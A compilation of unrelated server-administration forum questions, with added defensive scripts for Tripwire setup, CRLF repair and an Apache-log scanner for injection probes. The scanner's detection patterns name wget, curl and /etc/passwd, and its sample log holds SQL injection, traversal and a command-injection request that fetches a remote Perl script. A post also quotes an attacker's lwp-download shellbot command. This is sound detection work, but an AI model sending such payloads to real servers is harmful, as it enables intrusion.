IDS - Intrusion Detection System
Sep 25, 2007
I have recently been using Snort but I need something ideally graphically based so that it is easy to use and find your way around.
Can anyone recommend an IDS product that has a GUI?
I downloaded Tripwire version 2.4.1.1, but after the installation the /etc/tripwire/twinstall.sh file is not generated. I checked the contents of the RPM I downloaded and the script is not there.
How can I prepare the cfg file without this script?
[root@user]# rpm -qpl tripwire-2.4.1.1-1.i386.rpm
/etc/cron.daily/tripwire-check
/etc/tripwire
/etc/tripwire/twcfg.txt
/etc/tripwire/twpol.txt
/usr/sbin/siggen
/usr/sbin/tripwire
/usr/sbin/tripwire-setup-keyfiles
/usr/sbin/twadmin
/usr/sbin/twprint
/usr/share/doc/tripwire-2.4.1.1
/usr/share/doc/tripwire-2.4.1.1/COMMERCIAL
/usr/share/doc/tripwire-2.4.1.1/COPYING
/usr/share/doc/tripwire-2.4.1.1/ChangeLog
/usr/share/doc/tripwire-2.4.1.1/License-Issues
/usr/share/doc/tripwire-2.4.1.1/README.Fedora
/usr/share/doc/tripwire-2.4.1.1/TRADEMARK
/usr/share/doc/tripwire-2.4.1.1/policyguide.txt
/usr/share/doc/tripwire-2.4.1.1/tripwire.gif
/usr/share/man/man4/twconfig.4.gz
/usr/share/man/man4/twpolicy.4.gz
/usr/share/man/man5/twfiles.5.gz
/usr/share/man/man8/siggen.8.gz
/usr/share/man/man8/tripwire.8.gz
/usr/share/man/man8/twadmin.8.gz
/usr/share/man/man8/twintro.8.gz
/usr/share/man/man8/twprint.8.gz
/var/lib/tripwire
/var/lib/tripwire/report
Is there a tool for intrusion detection where a central machine is responsible for requesting file and directory information from clients and reporting changes?
Do you know of any open-source package, preferably one available for RHEL 4 and 5?
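The RPM listing above has no twinstall.sh, but it does ship twadmin, tripwire and /usr/sbin/tripwire-setup-keyfiles, and twinstall.sh never did anything those tools cannot do by hand: generate the site and local keys, sign twcfg.txt into tw.cfg, sign twpol.txt into tw.pol, then build the baseline database. The script below is an added example (not part of the original post or of the Tripwire package) that performs exactly that sequence. It assumes the Fedora layout shown in the listing (twcfg.txt and twpol.txt under /etc/tripwire) and that twcfg.txt names the local key as HOSTNAME-local.key; check LOCALKEYFILE in your twcfg.txt and adjust `local_key` if it differs. Passphrases are deliberately not passed with `--site-passphrase`/`--local-passphrase`, because they would be visible in `ps` and shell history; twadmin and tripwire prompt for them instead. DRY_RUN=1 prints the commands without running them.

```shell
#!/bin/sh
# Bootstrap Tripwire 2.4.x without twinstall.sh using only twadmin and tripwire.
# Added example, not Tripwire's own setup script. Assumptions: twcfg.txt and
# twpol.txt live in DIR (default /etc/tripwire) and twcfg.txt's LOCALKEYFILE is
# $(HOSTNAME)-local.key. Set DRY_RUN=1 to print the commands instead.

# run CMD... -- execute, or just print when DRY_RUN is set
run() {
    if [ -n "${DRY_RUN:-}" ]; then
        printf '%s\n' "$*"
    else
        "$@"
    fi
}

# tripwire_bootstrap [DIR] -- keys, signed config, signed policy, baseline DB
tripwire_bootstrap() {
    dir=${1:-/etc/tripwire}
    host=$(hostname 2>/dev/null || echo localhost)
    site_key="$dir/site.key"
    local_key="$dir/$host-local.key"   # must match LOCALKEYFILE in twcfg.txt

    for f in twcfg.txt twpol.txt; do
        if [ ! -f "$dir/$f" ]; then
            echo "missing $dir/$f" >&2
            return 1
        fi
    done
    # Never silently regenerate keys: every file signed with the old keys
    # (tw.cfg, tw.pol, the database, old reports) would become unreadable.
    if [ -e "$site_key" ] || [ -e "$local_key" ]; then
        echo "keys already exist in $dir; remove them deliberately first" >&2
        return 2
    fi

    # 1. Key pairs (twadmin prompts for each passphrase; nothing on the cmdline).
    run twadmin --generate-keys --site-keyfile "$site_key"
    run twadmin --generate-keys --local-keyfile "$local_key"
    # 2. Sign the plain-text config into tw.cfg; every later command reads it.
    run twadmin --create-cfgfile --cfgfile "$dir/tw.cfg" \
        --site-keyfile "$site_key" "$dir/twcfg.txt"
    # 3. Sign the policy; the output path comes from POLFILE in the config.
    run twadmin --create-polfile --cfgfile "$dir/tw.cfg" \
        --site-keyfile "$site_key" "$dir/twpol.txt"
    # 4. Build the baseline database (prompts for the local passphrase).
    run tripwire --init --cfgfile "$dir/tw.cfg"

    echo "done; the signed copies are authoritative now, so restrict or remove" \
         "$dir/twcfg.txt and $dir/twpol.txt" >&2
}

if [ "$#" -gt 0 ]; then
    tripwire_bootstrap "$@"
fi
```

Run it as root with no arguments after a `DRY_RUN=1 sh tripwire-bootstrap.sh /etc/tripwire` to see the commands first. After `--init`, the daily cron job from the RPM (/etc/cron.daily/tripwire-check) runs `tripwire --check` against the baseline; re-sign the policy with `--create-polfile` and rebuild the database with `--init` whenever you edit twpol.txt, and keep a copy of the keys and database somewhere the host cannot write.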
server intrusion: quick fixes
My Windows VPS has come under heavy attack by hackers trying to get through MSFTPSVC for the past month and they finally managed to somehow get in 2 days ago. Somehow, the "Allow anonymous login" setting was selected in my FTP settings and they got in.
They even managed to turn off my firewall. I'm guessing they used a buffer overflow or some other Windows Server 2003 weakness that was fixed in SP2 (too bad SP2 isn't supported by SWSoft yet).
The attacks began less than 1 week after I had signed up with Virpus. I didn't even have my domain name pointing to the server or a site up when the first set of dictionary attacks began. How common is that 0_0 ?
Anyway, since I now know they've gotten in I've run a virus check and everything looks clean but I really want to run some kind of root kit detection software. I've tried everything suggested on the antirootkit website but none of them seem to work on a VPS.
I've just installed BFD on a new server:
[url]
And I'm getting the following in an email every 10 minutes:
Code:
/usr/local/bfd/conf.bfd: line 26:
: command not found
/usr/local/bfd/conf.bfd: line 38:
: command not found
/usr/local/bfd/conf.bfd: line 47:
: command not found
/usr/local/bfd/conf.bfd: line 59:
: command not found
/usr/local/bfd/conf.bfd: line 60:
: command not found
/usr/local/bfd/conf.bfd: line 76:
: command not found
/usr/local/bfd/conf.bfd: line 88:
: command not found
The email is being sent from:
Cron Daemon <root@hostname.com> (replaced hostname myself)
Now I know this isn't R-fx Networks support, but none of their support options seem to work, so I figured I'd post here considering the amount of users that are likely to be using BFD (or you should be).
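The shape of that error is the tell: the line numbers in the message point at lines that look empty, and the word before ": command not found" is missing because it is a carriage return, which the mail client renders as a line break. That is what a shell does with a file saved with DOS (CRLF) line endings: on a blank line the only "command" is `\r`. The script below is an added example, not part of the original post or of the BFD package; it checks a config file for carriage returns, backs it up and rewrites it in place through the existing inode so the owner and mode that BFD's cron job relies on are preserved. The sample file it is tested against is constructed, with made-up variable names.

```shell
#!/bin/sh
# Detect and repair CRLF line endings in a shell-sourced config such as
# /usr/local/bfd/conf.bfd. Added example, not R-fx Networks code.
# A line that is empty apart from a trailing CR makes the shell run a command
# named "\r", which prints as:   conf.bfd: line 26: <CR>: command not found

# has_crlf FILE -- exit 0 if FILE contains any carriage return
has_crlf() {
    ! tr -d '\r' < "$1" | cmp -s - "$1"
}

# strip_crlf FILE -- remove CRs in place; writing through the existing file
# (cat > FILE) keeps owner, group and mode, unlike mv'ing a new file over it
strip_crlf() {
    tmp="$1.tmp.$$"
    tr -d '\r' < "$1" > "$tmp" && cat "$tmp" > "$1"
    rc=$?
    rm -f "$tmp"
    return $rc
}

# fix_crlf FILE -- back up and repair only when the file actually needs it
fix_crlf() {
    if has_crlf "$1"; then
        cp -p "$1" "$1.crlf.bak" && strip_crlf "$1" \
            && echo "fixed $1 (original kept as $1.crlf.bak)"
    else
        echo "$1 already has LF line endings"
    fi
}

if [ "$#" -gt 0 ]; then
    for f in "$@"; do fix_crlf "$f"; done
fi
```

Usage: `sh fix_crlf.sh /usr/local/bfd/conf.bfd`, then run the BFD check by hand once (the same command cron runs) and confirm the mail stops. If `has_crlf` says the file is clean, the problem is something else, such as a stray byte from a copy-paste; `cat -v conf.bfd | sed -n '26p;38p'` will show whatever non-printing character sits on those lines.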
I have a client that is certain someone is trying to hack her web portal. I need to set up something that will alert me on suspicious activity on the server, for example someone fiddling with requests trying to make SQL / shell injection and similar threats.
Does any tool (for example a bash script with grep) exist that would parse the raw Apache logs and report if something is suspicious? Apache logs don't show the POST data, so I am talking to the admin about setting up the dump_io Apache mod that enables this.
Or am I going into wrong direction here and there is whole another way to do this? I searched the web and forums for anything like this and didn't find anything.
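A grep-based first pass over access_log is a reasonable place to start, as long as you treat it as triage rather than protection. The script below is an added example, not part of the original post; it flags request lines that match common SQL injection, command injection, traversal and XSS probes in both raw and %-encoded form, and summarises hits per client address. The six log lines it is tested against are constructed (RFC 5737 addresses, invented paths). Its limits are the ones the post already runs into: POST bodies are not in access_log, and a fixed regex misses double encoding, `/**/` comment tricks beyond the few handled here, and anything the attacker bothers to obfuscate, which is why a request-inspecting module such as mod_security, rather than a log scanner, is the usual next step.

```shell
#!/bin/sh
# First-pass scanner for injection probes in an Apache combined access log.
# Added example, not the poster's tool. Triage only: no POST bodies, no
# decoding beyond the literal %-encoded alternatives listed below.

# Whitespace as an attacker writes it in a URL: +, %20, a space, or /**/
SP='(\+|%20| |/\*\*/)'
# One alternation so each line is reported at most once.
INJ_PATTERN="union${SP}+(all${SP}+)?select"
INJ_PATTERN="$INJ_PATTERN|(%27|')${SP}*(or|and)${SP}+"
INJ_PATTERN="$INJ_PATTERN|(;|%3b|[|]|%7c)${SP}*(cat|wget|curl|lwp-download|id|uname|ls|perl|sh)(${SP}|;|%3b|\")"
INJ_PATTERN="$INJ_PATTERN|\.\./|%2e%2e/|/etc/passwd|%00|<script|%3cscript"

# scan_access_log FILE -- print every matching line (case-insensitive)
scan_access_log() {
    grep -E -i "$INJ_PATTERN" "$1"
}

# top_attackers FILE -- matching lines grouped by client IP, busiest first
top_attackers() {
    scan_access_log "$1" | awk '{print $1}' | sort | uniq -c | sort -rn
}

# sample_log FILE -- constructed sample lines (RFC 5737 addresses), not real traffic
sample_log() {
    cat > "$1" <<'EOF'
198.51.100.7 - - [25/Sep/2007:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [25/Sep/2007:10:01:05 +0000] "GET /news.php?id=1'%20OR%20'1'='1 HTTP/1.1" 200 5120 "-" "sqlmap/1.0"
203.0.113.5 - - [25/Sep/2007:10:01:06 +0000] "GET /news.php?id=-1%20UNION%20SELECT%201,2,3-- HTTP/1.1" 500 0 "-" "sqlmap/1.0"
192.0.2.44 - - [25/Sep/2007:10:02:11 +0000] "GET /dl.php?file=../../../../etc/passwd HTTP/1.1" 404 210 "-" "curl/7.15"
198.51.100.7 - - [25/Sep/2007:10:03:00 +0000] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.5 - - [25/Sep/2007:10:04:30 +0000] "GET /img.php?cmd=;wget%20http://198.51.100.9/x.pl HTTP/1.1" 200 12 "-" "-"
EOF
}

if [ "$#" -gt 0 ]; then
    for f in "$@"; do
        echo "== $f"
        scan_access_log "$f"
        echo "-- hits by client:"
        top_attackers "$f"
    done
fi
```

Run it from cron against the previous hour's log and mail the output only when it is non-empty; the per-client summary is what you act on (a 403 or a firewall rule for the address), since one hit from a scanner is noise and thirty from one address in a minute is the "someone is fiddling" signal the client is describing.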
I have a few different types of servers, all of which came with their own KVMoIP setup, aka DRAC and iLO which have worked only so so since their deployment. The HP iLO has performed absolutely flawlessly but the DRAC on the other hand has been nothing less than a complete nightmare.
I'm looking for a KVM over IP system that we can connect to multiple servers, mainly Dell, that is 100% reliable and completely stable. Not something that will be giving Java errors randomly when you actually need it to work.
So far I've come across the Raritan Dominion KX II which looks pretty promising. Are there any other KVM over IP systems or manufacturers that I should look into? Has anyone used this and can you comment about its reliability?
Recently, my server has been running real slow and I don't know why... I've not noticed any increase in traffic (In fact it goes slow with no traffic on it...), what are some things I can look at to try and diagnose the problem? I know next to nothing about *nix so please speak in great detail.
Anytime I restart Apache, it loads quick for a few seconds then gets slow again...
Here are the top few processes listed on the process manager: .....
I have a VPS account with Plesk, and I am peaking out my system RAM at 128 MB. The host said to allocate more = purchase more. What I would like to do is hunt down where I am using the most of it. I have 8 sites (none that are too big). Most of them are WordPress sites.
Would caching help? Not sure where to look to find this out.
Is there any billing software/script that enables customers to view their invoice without logging in?
Is there anything like system cleaning in a VPS (Linux with Apache)? I need to do system cleaning so that my space and performance can increase.
Is there anything like that in Linux?
I've been getting the following System Warning every hour since I set the server up 5 days ago and Google hasn't been a lot of help in tracking down what it means and if I should be concerned. I'm hoping someone here can point me in the right direction. I'm running Windows 2003 Web Edition.
Quote:
Event Type:Warning
Event Source:LSASRV
Event Category:SPNEGO (Negotiator)
Event ID:40960
Date:3/20/2007
Time:7:45:33 PM
User:N/A
Computer:B02S08MR
Description:
The Security System detected an authentication error for the server DNS/ns.ufcom.com. The failure code from authentication protocol Kerberos was "There are currently no logon servers available to service the logon request. (0xc000005e)".
For more information, see Help and Support Center at
[url]
Data:
0000: 5e 00 00 c0
I keep receiving hacking attempts from someone accessing my server and running commands like these:
Code:
hubberfix
sh -c cd /tmp;lwp-download [url]
shellbot
I cannot find any logs with these attempts. Or at least any with info like an IP address or host doing this.
Not to sound like a noob, but where can I find logs that would tell me all the commands run on my system? FYI, I'm running Debian Sarge, and I looked in "/var/log" and I can't find much of anything.
There's bloody heaps of them. Which one do I go for on my two new file servers? Which operating system out of these is the most common, has the most support, is most compatible? The server will be used to host videos and will run c-panel. A lightweight OS is probably preferred but I really have no idea. And in case it helps, the servers have 512 MB of RAM, about 30-40 GB of HDD (not actually sure) and an old AMD Duron.
CentOS
Debian
Direct Admin
Fedora
FreeBSD
Gentoo LiveCD
Redhat
Slackware
I just spent over 10 hours on my node configuration (Debian etch). I have installed a lot of stuff, made a RAID1 array, control panel, some tools, rules etc etc etc.
I don't want to see that some day something crashes and I must start over with everything.
What do you guys suggest as a backup method, maybe some how-to to back up the WHOLE system with all files, RAID configuration etc.?
I don't need incremental backups at all; I just want to save/back up the current system, and maybe restore it if something bad happens.
Which of these operating systems is the best one for one VPS?
CentOS 4 (32bit)
CentOS 4 (64bit)
CentOS 5 (32bit)
Fedora Core 3 (32 bit)
Fedora Core 4 (32 bit)
Fedora Core 5 (32bit)
Debian Sarge 3 (32bit)
Gentoo 3 (32 bit)
Opensuse 10 (32 bit)
Suse 9 (64 bit)
Ubuntu 6 (32bit)
Windows 2003 Std
I am planning to start Linux hosting but don't have much knowledge about the Linux operating system... can I do this without having a sufficient Linux background?
Also please suggest some good links from where I can get basic Linux commands and some kind of flash tutorials from which I get to know how to work in Apache and DNS etc.
How do I download a tar file using the Terminal?
I have a dedicated server running Linux CentOS.
The default setup of my file system is:
/dev/sda1 450GB
tmpfs 2GB
/usr/tmpDSK 485 MB
My Disk size is 500GB
I have a VPS with a WHM/cPanel base. I also installed the RT ticket system; it installed successfully, the same way I did on 5 other servers where it's OK, but on the VPS, due to a different Apache configuration, it gives me:
You haven't yet configured your webserver to run RT. You appear to have installed RT's web interface correctly, but haven't yet configured your web server to "run" the RT server which powers the web interface. The next step is to edit your webserver's configuration file to instruct it to use RT's mod_perl, FastCGI or SpeedyCGI handler.
Does someone know a good article on securing a Virtuozzo node/host server?
I wondered which Content Management System (CMS) is the best for a website? I read that there are many to choose from; examples are WordPress, Drupal, Joomla etc. Which CMS is more SEO optimised?
The website I will be setting up will be of the same genre as the following website startutor.sg. Therefore, I am wondering what CMS to use.
I thought of designing the website using AI or PSD and asking someone to code them (not sure of the terminology used) for me as I don't know anything about CSS, HTML etc.
One of our servers' system clock seems to gradually creep away from the correct time. It has been causing us a lot of issues. After one day it becomes more than one hour off. After each minute it becomes a few seconds off.
Any ideas what could be causing this? Its uptime is ~2 months so it doesn't happen when it goes offline, it happens while it is running.
Right now we have a cronjob running ntpdate every few minutes as even with the ntpd service running it would end up off by several minutes when we would check. I have a feeling this isn't a very reliable fix though.
I have brand new server with CentOS 5.3 and latest CentOS kernel (2.6.18-128.1.10.el5PAE).
I have brand new HDDs with no errors (the HDDs have only 1000 power-on hours, the server CPU temperature is normal, between 35-42 C). My server went read-only without any reason. I needed to fsck the main / partition (/home is separate), and it cleaned the journal; then the server came back online.
After 2 weeks it happened again. I did fsck on the / partition again and it recovered the journal as before. I decided to ask the data center to replace the RAID-1 card and memory, which they did. After 3 weeks the server went read-only again.
I SSH'd into the server and saw that the kswapd0 process was using 100% CPU and the load was over 170.
After fsck it recovered journal on / and server is again available.
I am trying to write a Perl script that sends mail to a user. I used system(mail -s test) and also send some messages using this.
But my issue is I receive the mail with HTML code like <br> and so on.
How do I get a plain-text mail using this system command?
Does anybody know which ticket system HostGator uses? Or is that their own unique system?
I had a Linux server (CentOS 5, MySQL 5, PHP 5, DirectAdmin). I had problems with Apache a few days ago, that's why I hired a sysadmin who tweaked the system (installed the PAE kernel) and some more configurations, and during the last 7-8 days the server worked w/o any downtime (before this the server had 1-2 downtimes per day -> OOM killer).
Now I have only SSH access (emails, DirectAdmin access give a "wrong password" answer). As my sysadmin told me, it became a read-only system.
I can't even reboot the system
Quote:
[root@server sa]# reboot
reboot: /usr/local/lib/libpng12.so.0: no version information available (required by /usr/lib/libcairo.so.2)
Such few commands work; most of the commands that I know don't work
Quote:
[root@server ~]# ls -la
ls: error while loading shared libraries: libacl.so.1: cannot open shared object file: No such file or directory
I have had a shared host with them for a few months, where the disk usage for home/backup is usually around 85-95%. Right now I am experiencing very slow download speed. What about yours?
Server Load 2.92 (8 cpus)
Memory Used 42.6 %
Swap Used 0.01 %
Disk /dev/sdc1 (/home) 91 %
Disk /dev/sdd1 (/backup) 90 %
Disk /dev/sde1 (/backup/cpbackup/weekly) 43 %
Disk /dev/ram0 (/ramdisk) 24 %
Disk /dev/sdb1 (/) 22 %